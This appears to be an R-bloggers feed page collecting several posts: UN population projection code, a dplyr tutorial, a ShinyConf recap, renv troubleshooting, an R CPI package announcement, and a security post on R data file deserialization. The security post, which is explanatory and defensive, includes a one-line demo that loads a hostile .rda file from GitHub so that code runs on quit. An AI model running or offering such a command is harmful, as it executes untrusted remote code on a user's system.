      AgeGrp == "100+" ~ 100,
      TRUE ~ suppressWarnings(as.numeric(as.character(AgeGrp)))
    ))
  
    
    
  this_mort_m <- this_mort |>
    # sometimes more deaths than people (eg 1 death, 0 people) so cap the death ratio at 1
    mutate(DeathMale = pmin(1, DeathMale / PopMale)) |>
    select(Time, AgeGrp, DeathMale) |>
    mutate(Time = as.character(Time)) |>
    pivot_wider(id_cols = AgeGrp, names_from = Time, values_from = DeathMale) |>
    arrange(AgeGrp) |>
    select(-AgeGrp) |>
    as.matrix()
  
  this_mort_f <- this_mort |>
    mutate(DeathFemale = pmin(1, DeathFemale / PopFemale)) |>
    select(Time, AgeGrp, DeathFemale) |>
    mutate(Time = as.character(Time)) |>
    pivot_wider(id_cols = AgeGrp, names_from = Time, values_from = DeathFemale) |>
    arrange(AgeGrp) |>
    select(-AgeGrp) |>
    as.matrix()
  
  # check the years are correct, didn't get mangled or reordered
  stopifnot(all(colnames(this_mort_f) == the_years))
  stopifnot(all(colnames(this_mort_m) == the_years))
  
  this_pop <- pop_all |>
    filter(Location == the_country & Variant == "Medium") |>
    filter(Time == min(the_years)) |>
    # next step important because we will be sorting by AgeGrp
    mutate(AgeGrp = case_when(
      AgeGrp == "100+" ~ 100,
      TRUE ~ suppressWarnings(as.numeric(as.character(AgeGrp)))
    )) |>
    arrange(AgeGrp) 
  
  # convert to units, not thousands of people:
  this_pop_m <- this_pop$PopMale * 1000
  this_pop_f <- this_pop$PopFemale * 1000
  
  # reality check
  # Population in millions; should be about 0.3 if the_country is Vanuatu, about 1400 if India:
  (sum(this_pop_m) + sum(this_pop_f) ) / 1e6
  
  # net migration
  this_cnmr <- indicators |>
    filter(Location == the_country & Time %in% the_years) |>
    arrange(Time) |>
    pull(CNMR) / 1000
  
  # sex ratio at birth
  this_srb <- indicators |>
    filter(Location == the_country & Time %in% the_years) |>
    arrange(Time) |>
    pull(SRB) / 100
  
  this_proj <- pop_proj(
                  start_pop_m = this_pop_m, 
                  start_pop_f = this_pop_f, 
                  start_year = min(the_years), 
                  end_year = max(the_years), 
                  fertility = this_fert, 
                  mort_m = this_mort_m,
                  mort_f = this_mort_f,
                  net_migration = this_cnmr,
                  sex_ratio_birth = this_srb
    
  )
  return(list(un_proj = this_proj,
         un_pop_m = this_pop_m,
         un_pop_f = this_pop_f,
         un_fert = this_fert,
         un_mort_m = this_mort_m,
         un_mort_f = this_mort_f,
         un_cnmr = this_cnmr,
         un_srb = this_srb))
}

the_country <- "Vanuatu"
my_proj <- repeat_un_proj(the_country)$un_proj

# total population
comp_data <- indicators |>
  filter(Location == the_country & Variant == "Medium" & Time %in% 2020:2100) |>
  select(Time, `UN original` = TPopulation1Jan) |>
  mutate(`Reproduction` = as.numeric(apply(my_proj$PopM, 2, sum) + apply(my_proj$PopF, 2, sum)) / 1000) 

# First year should be an exact match:
stopifnot(comp_data[1, ]$`UN original` == comp_data[1, ]$Reproduction)


comp_data |>
  gather(variable, value, -Time) |>
  ggplot(aes(x = Time, y = value, colour = variable)) +
  geom_line() +
  scale_y_continuous(label = comma) +
  labs(title = the_country,
       subtitle = "Attempt to re-create the UN population projections from population in 2020, fertility and mortality rates",
       y = "Population", x = "", colour = "")

As we can see, the results are pretty much identical. Let’s look at my projected births and deaths based on fertility and mortality rates, and compare them to the published projected numbers:

# births
indicators |>
  filter(Location == the_country & Variant == "Medium" & Time %in% 2020:2100) |>
  select(Time, `UN original` = Births) |>
  mutate(Reproduction = as.numeric(my_proj$PopM[1,] + my_proj$PopF[1, ]) / 1000) |>
  gather(variable, value , -Time)  |>
  ggplot(aes(x = Time, y = value, colour = variable)) +
  geom_line() +
  labs(title = the_country,
       subtitle = "Attempt to re-create the UN population projections from population in 2020, fertility and mortality rates",
       y = "Births (thousands)", x = "", colour = "")

# deaths
indicators |>
  filter(Location == the_country & Variant == "Medium" & Time %in% 2020:2100) |>
  select(Time, `UN original` = Deaths) |>
  mutate(Reproduction = as.numeric(my_proj$deaths) / 1000) |>
  gather(variable, value , -Time)  |>
  ggplot(aes(x = Time, y = value, colour = variable)) +
  geom_line() +
  labs(title = the_country,
       subtitle = "Attempt to re-create the UN population projections from population in 2020, fertility and mortality rates",
       y = "Deaths (thousands)", x = "", colour = "")
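
To make the mechanics behind those births and deaths series concrete, here is a minimal sketch of a single projection step, for females only, on a toy five-age population. All the numbers are made up for illustration; only the arithmetic is meant to mirror the steps in pop_proj() above (survive and age one year, count deaths as the shortfall, then compute births from the average number of women over the two years).

```r
# Toy one-year cohort-component step, females only (all inputs hypothetical)
pop_f_prev <- c(100, 95, 90, 85, 80)        # females aged 0..4 in the previous year
mort_f     <- c(0.02, 0.01, 0.01, 0.02, 1)  # probability of dying during the year, by age
fert       <- c(0.10, 0.08)                 # births per woman for the "fertile" ages 2 and 3
srb        <- 1.045                         # boys born per girl

# Survivors age by one year; the oldest group drops out of the table
pop_f_next <- numeric(5)
pop_f_next[2:5] <- pop_f_prev[1:4] * (1 - mort_f[1:4])

# Deaths are the shortfall between last year's total and this year's survivors
# (computed before age zero is filled in, as in pop_proj)
deaths_f <- sum(pop_f_prev) - sum(pop_f_next)

# Births: fertility applied to the average number of women over the two years
mid_year_women <- (pop_f_prev[3:4] + pop_f_next[3:4]) / 2
births <- sum(mid_year_women * fert)

# Split births by sex and fill in age zero for girls
prop_boys <- srb / (1 + srb)
pop_f_next[1] <- births * (1 - prop_boys)

round(c(deaths = deaths_f, births = births, girls = pop_f_next[1]), 2)
```

The real function does the same thing with 121 single-year ages, both sexes, and a migration adjustment between the survival and birth steps.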

plot_mig <- function(the_country){
  p <- indicators |>
    filter(Location == the_country) |>
    ggplot(aes(x = Time, y = CNMR)) +
    geom_vline(xintercept = 2022, lty = 2, colour = "steelblue") +
    geom_hline(yintercept = 0, lty = 2, colour = "steelblue") +
    geom_line() +
    labs(title = the_country,
         subtitle = "Net migration rate per thousand people",
         y = "", x = "",
         caption = "Source: UN World Population Prospects 2022")
  
  return(p)
}

plot_mig("Vanuatu") + plot_mig("Fiji") + 
  plot_mig("Australia") + plot_mig("India") +
  plot_layout(ncol = 2)

For countries that have good data on it, migration is a big deal in the projections; but forecasting is hard, particularly of the future.
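
As a rough illustration of how pop_proj() turns a net migration rate into people by age and sex, the sketch below spreads a total number of net migrants across ages 0 to 120 using the same default normal weights (mean 28, standard deviation 11). The population size, migration rate and female share are hypothetical values chosen only for the example.

```r
# Spread net migrants across single-year ages (hypothetical inputs)
ages    <- 0:120
weights <- dnorm(ages, mean = 28, sd = 11)
weights <- weights / sum(weights)       # normalise so the weights sum to 1

total_pop    <- 300000                  # hypothetical population
net_rate     <- -0.002                  # hypothetical: net loss of 2 per thousand
female_share <- 0.5                     # hypothetical share of migrants who are female

total_migrants <- total_pop * net_rate
mig_f <- total_migrants * female_share * weights
mig_m <- total_migrants * (1 - female_share) * weights

# The age-specific numbers add back up to the total, and peak at age 28
sum(mig_f) + sum(mig_m)
ages[which.max(weights)]
```

Because only the total rate varies by year, the age profile of migrants is the same in every projection year, which is the limitation noted in the function documentation.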

Here’s the final result comparing UN projections with mine for a few interesting countries:

Adjusting the starting point

#-----------------changing one or two factors while keeping the rest the same--------------

# Say we had the 2020 Vanuatu census so we knew the real population then, and wanted
# to redo the population projections with everything else staying as it was before


# Source: Vanuatu 2020 Census Analytical Report, Volume 2 (Vanuatu_2020_Census_Analytical_report_Vol_2.pdf)
revision_country <- "Vanuatu"
van_orig <- repeat_un_proj(revision_country)

# rough adjustment of starting population in 2020 to make totals match the Census totals.
# In principle could of course use the actual numbers by single age category.
revised_pop_m <- van_orig$un_pop_m * 151597 / sum(van_orig$un_pop_m)
revised_pop_f <- van_orig$un_pop_f * 148422 / sum(van_orig$un_pop_f)

# calculate the crude birth rate in the current projection
un_cbr_2020 <- (van_orig$un_proj$PopM[1, 2]  + van_orig$un_proj$PopF[1, 2]) / 
  sum(van_orig$un_proj$PopM[, 2], van_orig$un_proj$PopF[, 2]) * 1000

# make a rough adjustment of future fertility rates assuming they are "out" by the
# same proportion that crude birth rate was out in 2020
adj_ratio <- 28.2 / un_cbr_2020
revised_fert <- van_orig$un_fert * adj_ratio

# Refit the projection with the above rough adjustments:
revised_proj <- pop_proj(
  start_pop_m = revised_pop_m,
  start_pop_f = revised_pop_f,
  start_year = 2020,
  end_year = 2100,
  fertility = revised_fert,
  mort_m = van_orig$un_mort_m,
  mort_f = van_orig$un_mort_f,
  sex_ratio_birth = van_orig$un_srb,
  net_migration = van_orig$un_cnmr)


projected_pop <- apply(revised_proj$PopM, 2, sum) + apply(revised_proj$PopF, 2, sum)

#-----------------Compare total population----------------
comp_data <- indicators |>
  filter(Location == revision_country & Variant == "Medium" & Time %in% 2020:2100) |>
  select(Time, `2022 UN projections` = TPopulation1Jan) |>
  mutate(`Revised with 2020 census` = as.numeric(projected_pop / 1000) )


p5 <- comp_data |>
  filter(Time <= 2050) |>
  gather(variable, value, -Time) |>
  ggplot(aes(x = Time, y = value, colour = variable)) +
  geom_line() +
  labs(title = revision_country,
       subtitle = "Attempt to re-create the UN population projections from population in 2020, fertility and mortality rates",
       y = "Population", x = "", colour = "")

#--------------Compare population pyramids-------------------------
d <- tibble(value = c( revised_proj$PopM[, 31], revised_proj$PopF[, 31],   
                  van_orig$un_proj$PopM[, 31],  van_orig$un_proj$PopF[, 31]),
       sex = rep(c("Male", "Female", "Male", "Female"), each = 121),
       model = rep(c("Revised projections with 2020 census, made in 2024", "UN projections, made in 2022"), each = 242),
       age = rep(0:120, 4)) |>
  mutate(agef = fct_reorder(as.character(age), age),
         model = fct_rev(model)) |>
  filter(age < 100)

d |>
  filter(sex == "Female") |>
  ggplot(aes(x = value, y = agef)) +
  facet_wrap(~model) +
  geom_col(fill = "brown", colour = NA) +
  geom_col(data = filter(d, sex == "Male"), aes(x = -value), fill = "orange", colour = NA) +
  geom_vline(xintercept = 0, colour = "white") +
  labs(x = "Number of people", y = "",
       title = "Comparison of UN original and revised population projections",
       subtitle = "Population age distribution in 2050") +
  scale_x_continuous(breaks = c(-4000, -2000, 0, 2000, 4000), labels = c("4,000", "Male", 0, "Female", "4,000")) +
  theme(panel.grid = element_blank()) +
  scale_y_discrete(breaks = 1:20 * 5)

And that’s what gets us these results:

I’m hoping this might be actually useful for pragmatic updates of the UN population projections when more current data is available, without having to revise everything from scratch.

OK, that’s all for today.

To leave a comment for the author, please follow the link and comment on their blog: free range statistics - R.

Continue reading: Reproducing and adapting the UN Population Projections by @ellis2013nz

Compare numeric vectors in R

R Archives » Data Science Tutorials — Sat, 04 May 2024 12:21:28 +0000

[This article was first published on R Archives » Data Science Tutorials, and kindly contributed to R-bloggers]. (You can report issue about the content on this page here)

The post Compare numeric vectors in R appeared first on Data Science Tutorials

In this post on comparing numeric vectors in R, we explore the usage of the ‘near’ function from the ‘dplyr’ package.

The article is divided into two examples, with the first one demonstrating the basic application of the ‘near’ function and the second one showcasing its flexibility with user-defined tolerance.

Compare numeric vectors in R

To begin, we create exemplifying data by defining two numeric vectors, ‘x1’ and ‘x2’.

x1 <- 1:5                         
x2 <- c(1, 2.2, 2.5, 4, 5.3)

We then load the ‘dplyr’ package to access the ‘near’ function (install it first if it is not already available).

library(dplyr)

Example 1: Basic Application of the ‘near’ Function

The function returns a logical vector indicating whether the corresponding elements of the two vectors are equal, up to a very small default tolerance.

In this case, only the first and fourth elements are identical.

near(x1, x2)    
[1]  TRUE FALSE FALSE TRUE FALSE

Example 2: User-Defined Tolerance

In Example 2, we introduce the ‘tol’ argument, which allows for increased tolerance in the comparison.

near(x1, x2, tol = 0.2)   
[1]  TRUE FALSE FALSE TRUE FALSE

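With a tolerance of 0.2 the result is unchanged for these vectors: ‘near’ tests whether the absolute difference is strictly less than ‘tol’, and the second and third pairs differ by 0.2 and 0.5 respectively. A tolerance larger than 0.5 would be needed for both of them to be considered the same.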

Adjusting the tolerance can be beneficial depending on specific requirements.
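
To see what the tolerance is doing, here is a small base R sketch. The helper near_sketch() is a hypothetical stand-in written for this illustration; it mirrors, to my understanding, the comparison that dplyr’s ‘near’ performs (absolute difference strictly less than ‘tol’, with a default of the square root of machine epsilon), so that the example runs without any packages.

```r
# Hypothetical stand-in mirroring the comparison made by dplyr::near()
near_sketch <- function(x, y, tol = .Machine$double.eps^0.5) {
  abs(x - y) < tol
}

x1 <- 1:5
x2 <- c(1, 2.2, 2.5, 4, 5.3)

# Exact comparison trips over floating-point error; the default tolerance absorbs it
sqrt(2)^2 == 2
near_sketch(sqrt(2)^2, 2)

# Differences of 0.2 or more are not "near" at tol = 0.2
near_sketch(x1, x2, tol = 0.2)

# Every pair differs by less than 0.6, so all elements match at tol = 0.6
near_sketch(x1, x2, tol = 0.6)
```

The main use of the default tolerance is the first case: guarding against tiny floating-point discrepancies rather than treating visibly different numbers as equal.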

Summary

The ‘near’ function from the ‘dplyr’ package in R is a valuable tool for comparing numeric vectors and offers flexibility through the ‘tol’ argument.

To leave a comment for the author, please follow the link and comment on their blog: R Archives » Data Science Tutorials.

Continue reading: Compare numeric vectors in R

Highlights from ShinyConf 2024

Appsilon — Sat, 04 May 2024 06:28:36 +0000

[This article was first published on Appsilon | Enterprise R Shiny Dashboards, and kindly contributed to R-bloggers]. (You can report issue about the content on this page here)

ShinyConf 2024 was a resounding success!

We brought together the vibrant R/Shiny community for three days of insightful sessions, engaging workshops, and valuable networking opportunities. From seasoned developers to newcomers, the conference had something for everyone.

Insightful Sessions and Memorable Speakers

The sessions covered a wide range of topics, from best practices in Shiny development to innovative use cases across various industries, spanning four tracks: Innovation, Enterprise, Data 4 Good, and Life Sciences.

ShinyConf attendees gained valuable insights from industry experts. We had the opportunity to dive deep into specific areas of interest through hands-on workshops on modular app development (with Veerle van Leemput), PyShiny, Rhino, and Testing with Cypress.

The speaker lineup was truly impressive, featuring renowned experts and thought leaders in R/Shiny who spoke on relevant and practical topics.

Tailoring Shiny for Modern Users by Lindsay Jorgenson & John Coene

One notable session was by Joe Cheng, CTO of Posit, on Beyond Async: Intra-Session Concurrency in Shiny with ExtendedTask. During his talk, he introduced ExtendedTask, which allows you to run long-running tasks for a user while preserving both inter- and intra-session concurrency. Plus, he closed a six-year-old issue live.

Beyond Async: Intra-Session Concurrency in Shiny with ExtendedTask

Shinylive for R, a new way of running Shiny apps in the browser, was also heavily discussed during the conference, especially during George Stagg’s keynote on reproducible data science and Barret Schloerke’s session on Shinylive.

Reproducible data science with webR and Shinylive

Insightful Keynotes

We had wonderful keynotes that covered thriving as an open source maintainer with Tracy K. Teal, the future of Shiny with Pedro Silva, webR and Shinylive with George Stagg, Shiny in Enterprise with Eric Kostello, and real-world use cases for AI in Shiny with Tanya Cashorali.

Beyond the Hype: Real-World Use Cases for AI in Shiny

*Replays of all the sessions are available on RingCentral.

New Open Source Package Announcement

One of the most exciting announcements at ShinyConf 2024 was the introduction of a new open-source package. This package promises to improve the way developers build and deploy enterprise Shiny applications. Details will be revealed soon! Watch our social media pages (LinkedIn & Twitter), join our community, and subscribe to our newsletter, Shiny Weekly, to learn more.

*Update: Learn more about the package in our intro blog post, check it out on GitHub, and read the documentation.

Hex Logo Contest for Package Developers

Also, as part of Appsilon’s commitment to supporting the vibrant R package ecosystem, we’re hosting a Hex Logo Contest for developers who want unique hex designs for their packages. The contest is still on and closes on the 31st of May 2024. You can learn more and register on our website.

What Package R You? Quiz

In case you missed it, we added a fun element to the conference. Attendees had the opportunity to participate in our Ultimate R Package Personality Quiz. This interactive quiz matches you with an R package based on your personality and coding style. It’s still available, and you can try it out yourself.

Redesign of Rhinoverse

Our Lab Lead, Jakub Nowicki, unveiled the redesign of the Rhinoverse hexes during the conference. We hope you love the fresh look of our open-source packages as much as we do!

Rhinoverse

Conclusion

In conclusion, ShinyConf 2024 was a wonderful experience that brought together new and experienced R/Shiny professionals and thought leaders from several industries and research backgrounds.

Here’s some feedback we’ve received from the community:

“The event was incredibly informative and useful, and the perspectives about business use cases for shiny will be useful as some of us push for wider adoption.”

– ShinyConf 2024 Attendee

“This was a great event! It was the first conference our Shiny R team has been to. I loved that it was virtual and the cost made it a no-brainer to my management. There was a good mix of speakers (some dev, some corporate, some scientist), which was cool.”

– ShinyConf 2024 Attendee

To stay current on all things Shiny, follow us on social media, subscribe to Shiny Weekly, and join our community on Slack.

We hope you had a great experience, and we look forward to seeing you at ShinyConf 2025!

The post appeared first on appsilon.com/blog/.

To leave a comment for the author, please follow the link and comment on their blog: Appsilon | Enterprise R Shiny Dashboards.

Continue reading: Highlights from ShinyConf 2024

Things that can go wrong when using renv

Hugo Gruson — Sat, 04 May 2024 00:00:00 +0000

[This article was first published on Epiverse-TRACE developer space, and kindly contributed to R-bloggers]. (You can report issue about the content on this page here)

Throughout the Epiverse project, we use the renv R package to ensure reproducibility of the training materials and the pipelines we are providing. But we sometimes get reports from users who struggle to rebuild the environment and run the code.

In this post, we dissect the source of these issues, explain why in reality renv is not at fault, and how this is caused by the inherent complexity of reproducibility. The renv documentation already includes caveats explaining why some situations are bound to require more complex tools. This blog post reiterates some of these caveats and illustrates them with concrete examples.

Finally, we mention a couple of more complete (but more complex!) frameworks that can overcome the issues presented here. We do not explore these alternative frameworks in detail but provide links to more information.

Binaries vs building from source

Software, including R packages, can generally be delivered in two forms: as binaries or as source code. If you are building from the source code, you may in some cases need a compilation toolchain on your computer. If that toolchain is missing, it can lead to errors such as:

ld: warning: search path '/opt/gfortran/lib' not found
ld: library 'gfortran' not found

Most of the time, regular users of R will not see these errors because they are installing binaries. Indeed, CRAN provides pre-compiled binaries for Windows and macOS for the latest version of each package and of R.

With renv, you often want to install older versions of the packages, which won’t be available as binaries from CRAN. This means you are more likely to have to compile the package yourself and see this kind of error, even though renv is not causing it.
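
Before restoring an old environment, it can help to check whether your machine is set up to compile packages at all. The following is a minimal base R sketch, not an official renv diagnostic; the list of tool names is an assumption (typical for macOS and Linux, while Windows users normally get these through Rtools).

```r
# Which package type does this R installation install by default?
# "source" means packages are always compiled locally.
getOption("pkgType")

# Are common build tools visible on the PATH? An empty string means "not found".
tools_found <- Sys.which(c("make", "gcc", "gfortran"))
tools_found

missing_tools <- names(tools_found)[tools_found == ""]
if (length(missing_tools) > 0) {
  message("Not found on PATH: ", paste(missing_tools, collapse = ", "))
}
```

A missing tool here does not prove that a given package will fail to build, but it is a quick hint about why a source install may stop with a linker or compiler error.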

gfortran issues on Apple Silicon computers

If you are an Apple Silicon (Mac M1, M2, M3) user and encounter issues with gfortran, we have had success using the macrtools R package and we strongly recommend checking it out.

Beyond renv scope: incompatibility with system dependency versions

We discussed previously the topic of system dependencies, and dependencies on specific R versions. These special dependencies can also be a source of headaches when using renv.

The heart of the issue is that renv provides a simplified solution to reproducibility: it focuses on R packages and their versions. But other sources of non-reproducibility are outside its scope. In many cases, this will not be a problem, as the main source of non-reproducibility, especially in the relatively short-term, will be R package versions.

But sometimes, it is possible that the renv.lock lockfile requires such an old version of an R package that it was written with a syntax that is no longer supported by recent R versions or modern compilers.

For example, a recent project (from 2023) was trying to install version 0.60.1 of the matrixStats package (from 2021). This led to the following compilation error:

error: ‘DOUBLE_XMAX’ undeclared (first use in this function); did you mean ‘DBL_MAX’?
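
One cheap way to anticipate this kind of mismatch is to compare the R version you are running with the one recorded in the lockfile. The sketch below uses only base R; the lockfile version is a hypothetical value typed in by hand for illustration rather than read from an actual renv.lock.

```r
# Hypothetical value: the R version recorded in a project's renv.lock,
# copied here by hand for illustration
lockfile_r_version <- numeric_version("4.1.0")
running_r_version  <- getRversion()

if (running_r_version > lockfile_r_version) {
  message(
    "Running R ", as.character(running_r_version),
    " but the lockfile was written under R ", as.character(lockfile_r_version),
    "; old package sources may not compile cleanly."
  )
}
```

A version gap does not guarantee a failure, and matching versions do not rule one out (the compiler matters too), so treat this as a warning sign only.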

Expenditure-Based and Multivariate Weighted Indices: An R Package to Calculate CPI and Inflation

John Coker Ayimah — Fri, 03 May 2024 13:01:43 +0000

[This article was first published on R-posts.com, and kindly contributed to R-bloggers]. (You can report issue about the content on this page here)

Introduction

Hello everyone!
I’m excited to announce the release of our latest collaborative effort, an R package designed to make complex consumer price and inflation calculations a breeze: emWeightedCPI.
Here I will introduce you to what this package is about.

What is emWeightedCPI?

Our R package “emWeightedCPI” (hosted on GitHub) stands for Expenditure-based and Multivariate Weighted Consumer Price Index. It is the result of the combined effort of myself and two other talented individuals: Dr Paul A. Agbodza and George K. Agyen. It is a versatile tool that simplifies the calculation of standard Consumer Price Indices (CPI) and inflation using expenditure-based and multivariate weights. The package automates a proposed multivariate weighted indexing scheme for price data. More information can be found [here].

Why Create emWeightedCPI Package?

Normally, CPI is calculated from household expenditure data obtained from household expenditure surveys. However, these surveys are expensive, which makes them difficult to conduct on a regular basis. This package introduces an alternative weighting approach that enables the computation of variable weights using price data only.

This approach is convenient because it avoids the additional cost of conducting a household expenditure survey to generate the CPI used to determine inflation figures. Even so, one can still generate the Laspeyres CPI and inflation using this package.

The workings of the package

Using emWeightedCPI is as easy as taking a stroll! Begin by installing the package from GitHub:

install.packages("devtools")

devtools::install_github("JC-Ayimah/emWeightedCPI")

Once installed, load the package into your R environment with library(emWeightedCPI). Now you’re all set to dive into the world of emWeightedCPI and make use of its functions.

How does emWeightedCPI work?

The package contains four main functions:

mvw_cpi: This function calculates the multivariate weighted indices. It requires only one argument, data: a price dataset containing prices of various items for a base year and a current year. It calculates four index values (CPI values) from the data provided and returns them as a named vector.
mvw_inflation: Using the index values calculated by mvw_cpi, this function computes the inflation rate based on the selected index. It takes two arguments, index and data. The index argument takes one of four possible values: ‘fisher’, ‘paashe’, ‘laspeyres’ and ‘drobish’. The data argument is the price dataset from which inflation is to be determined.
eb_cpi: This function calculates the expenditure-based consumer price index. It takes two inputs, a price dataset and an expenditure dataset. The index it calculates is the Laspeyres index.
eb_inflation: Like mvw_inflation, this function calculates inflation, here based on the index calculated by eb_cpi. It takes the same arguments as eb_cpi.
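
For readers unfamiliar with the four index names, the sketch below computes their textbook, quantity-weighted versions in base R. This is an illustration only: the prices and quantities are invented, and it does not reproduce the package’s multivariate weighting scheme, which derives weights from price data alone.

```r
# Hypothetical prices and quantities for three items
p0 <- c(10, 20, 5)   # base year prices
p1 <- c(12, 22, 6)   # current year prices
q0 <- c(3, 1, 4)     # base year quantities
q1 <- c(2, 1, 5)     # current year quantities

laspeyres <- 100 * sum(p1 * q0) / sum(p0 * q0)  # prices weighted by the base year basket
paasche   <- 100 * sum(p1 * q1) / sum(p0 * q1)  # prices weighted by the current year basket
fisher    <- sqrt(laspeyres * paasche)          # geometric mean of the two
drobisch  <- (laspeyres + paasche) / 2          # arithmetic mean of the two

# Inflation relative to a base year index of 100, in percent
inflation <- c(laspeyres = laspeyres, paasche = paasche,
               fisher = fisher, drobisch = drobisch) - 100
round(inflation, 2)
```

The four indices differ only in which basket is used to weight the price changes, which is why they usually land close to one another.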

Usage Examples

Let’s create a price dataset containing the prices of 4 different items for a base year and a current year.

#create an arbitrary price data

mypriceData <- data.frame(
  x1 = runif(50, 9.9, 13.7), x2 = rnorm(50, 10.9, 2.1), x3 = runif(50, 12.2, 15), x4 = runif(50, 19.4, 24),  # base year prices
  y1 = runif(50, 26, 30), y2 = runif(50, 31, 38.9), y3 = runif(50, 28.2, 33.1), y4 = runif(50, 51.8, 60)     # current year prices
)

To calculate the multivariate weighted indices, simply use:

library(emWeightedCPI)

indices <- mvw_cpi(data = mypriceData)

indices

To calculate the multivariate weighted inflation based on a specific index (let’s say ‘fisher’), we use:

inflation_value <- mvw_inflation(index = "fisher", data = mypriceData)

inflation_value

The expenditure-based index (eb_cpi) and inflation (eb_inflation) can also be calculated easily using the code below. We first need to generate an expenditure dataset to use together with our previously created price data.

#pick the average base year prices from mypriceData

n_vec <- apply(mypriceData[, 1:4], 2, mean)

n_vec

#combine the output above into a dataframe with two columns and same

#number of rows as number of price items to create expenditure data

myexpData <- cbind.data.frame(item = names(n_vec), price = (unname(n_vec)))

myexpData

#calculate expenditure based CPI

exp_index <- eb_cpi(price_data = mypriceData, expenditure_data = myexpData)

exp_index

#calculate expenditure based Inflation

exp_inflation <- eb_inflation(mypriceData, myexpData)

exp_inflation

Conclusion

Innovation often thrives when minds come together, and emWeightedCPI is a testament to the power of collaboration. We’re incredibly proud of what we’ve achieved with this package, and we hope it becomes a valuable asset in your analytical toolkit.

Why Use emWeightedCPI?

Ease of Use: The functions in emWeightedCPI are designed to be intuitive and straightforward to use.
Flexibility: Users can customize the calculations to their specific requirements by adjusting the input parameters, especially for the mvw_inflation function.
Efficiency: With optimized algorithms, emWeightedCPI delivers fast and accurate results.

Get Started with emWeightedCPI Today!

If you’re looking to simplify your consumer price index and inflation rate calculations in R, give emWeightedCPI a try! You can install it directly from GitHub using:

install.packages("devtools")

devtools::install_github("JC-Ayimah/emWeightedCPI")

For more information and detailed documentation, check out the emWeightedCPI GitHub repository.

We hope you find emWeightedCPI as useful and exciting as we do! Feel free to reach out with any questions, feedback, or suggestions.

Happy calculating!

Expenditure-Based and Multivariate Weighted Indices: An R Package to Calculate CPI and Inflation was first posted on May 3, 2024 at 1:01 pm.

To leave a comment for the author, please follow the link and comment on their blog: R-posts.com.

Continue reading: Expenditure-Based and Multivariate Weighted Indices: An R Package to Calculate CPI and Inflation

CVE-2024-27322 Should Never Have Been Assigned And R Data Files Are Still Super Risky Even In R 4.4.0

hrbrmstr — Fri, 03 May 2024 10:12:52 +0000

[This article was first published on R Archives - rud.is, and kindly contributed to R-bloggers]. (You can report issue about the content on this page here)

I had not planned to blog this (this is an incredibly time-crunched week for me) but CERT/CC and CISA made a big deal out of a non-vulnerability in R, and it’s making the rounds on socmed, so here we are.

A security vendor decided to try to get some hype before 2024 RSAC and made a big deal out of what was/is known expected behavior in R data files. R Core took some measures to address the issue they outlined, but for the love of Henry, PLEASE do not think R data files are safe to handle if you weren’t the one creating them, or you do not fully know the provenance of them.

Konrad Rudolph and Iakov Davydov did some ace cyber sleuthing and figured out other ways R data file deserialization can be abused. Please take a moment and drop a note on Mastodon to them saying “thank you”. This is excellent work. We need more folks like them in this ecosystem.

Like many programming languages, R has many footguns, and R data files are one of them. R objects are wonderful beasts, and being able to serialize and deserialize those beasts is a super helpful bit of functionality. Also, R has something called active bindings. Amongst other things, they let you access an object to get a value, but — in doing so — code can get executed without you knowing it. Whether an R data file has an object with active bindings or not, it can be abused by attackers.
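To make the active-binding point concrete, here is a minimal, harmless sketch using base R's makeActiveBinding(). The names env, innocent_value, and counter are made up for illustration; in a hostile file the function body could do anything instead of bumping a counter.

```r
# A harmless demonstration: reading the "value" silently runs a function.
env <- new.env()
counter <- 0

makeActiveBinding("innocent_value", function() {
  counter <<- counter + 1   # side effect that happens on every read
  42                        # what the reader thinks they are getting
}, env)

env$innocent_value  # looks like a plain variable lookup
env$innocent_value  # ...but the function above runs each time

counter                                # number of times the hidden code ran
bindingIsActive("innocent_value", env) # one way to check a binding by name
```

Note that bindingIsActive() only helps if you already know which name and environment to check, which is part of why this is easy to miss.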

When you load() an R data file directly into your R session and into the global environment, the object(s) in it will, well, load there. So, if it has an object named print that’s going to be in your global environment and get called when print() gets called. Lather/rinse/repeat for any other object name. It should be pretty obvious how this could be abused.

A tad more insidious is what happens when you quit R. By default, on quit(), unless you specify otherwise, that function invocation will also call .Last() if it exists in the environment. This functionality exists in the event things need to be cleaned up. One “nice” aspect of .-prefixed R objects is that they’re hidden by default from the environment. So, you may not even notice if an R data file you’ve loaded has that defined. (You likely do not check what’s loaded anyway.)
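A small sketch of why the hidden objects are easy to miss. It builds a harmless stand-in file (the contents and the name quarantine are assumptions for illustration) and loads it into a separate environment rather than the global one. This only keeps names out of your workspace; load() still deserializes the file, so it is not a guarantee of safety.

```r
# Build a benign stand-in for an "untrusted" file in a temp location.
rda_path <- tempfile(fileext = ".rda")
local({
  .Last <- function() message("cleanup hook would run here")
  print <- function(...) message("masked print() would run here")
  save(.Last, print, file = rda_path)
})

# Load into a throwaway environment instead of the global environment.
quarantine <- new.env(parent = emptyenv())
loaded <- load(rda_path, envir = quarantine)

visible    <- ls(quarantine)                    # what a casual ls() shows
everything <- ls(quarantine, all.names = TRUE)  # includes dot-prefixed names
hidden     <- setdiff(everything, visible)

# Flag every loaded object that is a function.
is_fun <- vapply(
  everything,
  function(nm) is.function(get(nm, envir = quarantine)),
  logical(1)
)

hidden
is_fun
```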

It’s also possible to create custom R objects that have their own “finalizers” (ref reg.finalizer), which will also get called by default when the objects are being destroyed on quit.
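For readers who have not used finalizers, this is a minimal sketch modeled on the pattern in the reg.finalizer() help page. The names ran, on_destroy, and make_object are hypothetical, and the finalizer here only flips a flag.

```r
ran <- FALSE

# The finalizer: called with the object when it is garbage collected.
on_destroy <- function(e) ran <<- TRUE

make_object <- function() {
  obj <- new.env()
  # onexit = TRUE asks R to also run the finalizer when the session ends.
  reg.finalizer(obj, on_destroy, onexit = TRUE)
  invisible(NULL)  # obj becomes unreachable once this function returns
}

make_object()
invisible(gc())  # force a collection so the finalizer fires now

ran
```

With onexit = TRUE the same code path runs at quit, which is the behavior described above.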

There are also likely other ways to trigger unwanted behavior.

If you want to see how this works, start R from RStudio, the command line, or R GUI. Then, execute the following R code:

load(url("https://github.com/hrbrmstr/rdaradar/raw/main/exploit.rda"))

Then, quit R/RStudio/R GUI (this will be less dramatic on Linux, but the demo should still be effective).

If you must take in untrusted R data files, keep reading.

I threw together an R script along with a safer way to use it (a Docker container) to help R folks inspect the contents of R data files before actually using them. It also looks for some basic shady stuff and alerts you if it finds any. It’s a WIP, and issues + thoughtful PRs are welcome.

If one were to run Rscript check.R from that repo with that exploit.rda file as a parameter, one would see this:

-----------------------------------------------
Loading R data file in quarantined environment…
-----------------------------------------------

Loading objects:
  .Last
  quit

-----------------------------------------
Enumerating objects in loaded R data file
-----------------------------------------

